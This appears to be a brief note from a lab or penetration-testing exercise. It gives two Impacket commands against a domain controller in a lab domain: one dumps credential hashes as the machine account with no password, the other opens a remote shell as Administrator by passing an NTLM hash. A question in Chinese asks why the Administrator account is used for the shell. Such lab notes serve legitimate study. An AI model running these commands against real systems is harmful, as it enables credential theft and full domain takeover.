<1> python3 secretsdump.py de1ay.com/DC$@10.10.10.10 -no-pass

<2> python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24 de1ay.com/Administrator@10.10.10.10
疑惑点: 这里为什么不用DC$这个隐藏用户而要用Administrator用户getshell?